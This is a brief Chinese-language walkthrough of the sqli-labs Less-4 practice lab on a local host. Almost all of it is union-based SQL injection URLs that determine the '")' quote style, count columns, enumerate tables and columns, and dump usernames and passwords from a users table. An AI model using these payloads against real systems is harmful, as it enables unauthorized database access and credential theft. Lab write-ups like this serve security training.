判断注入类型
注入类型为")字符型
查找回显点
http://127.0.0.1/sqlilabs/Less-4/?id=1") order by 3--+
http://127.0.0.1/sqlilabs/Less-4/?id=1") order by 4--+ 回显点为3
查看可存放位置
http://127.0.0.1/sqlilabs/Less-4/?id=-1") union select 1,2,3-- -
查当前数据库名
http://127.0.0.1/sqlilabs/Less-4/?id=-1") union select 1,2,database()-- - %%这里使用#无效,我们尝试使用--(space) 或者--+
查看表名
http://127.0.0.1/sqlilabs/Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
查看字段名
http://127.0.0.1/sqlilabs/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273--+
查看字段详细信息
http://127.0.0.1/sqlilabs/Less-4/?id=-1") union select 1,2,group_concat(username,0x3a,password) from users--+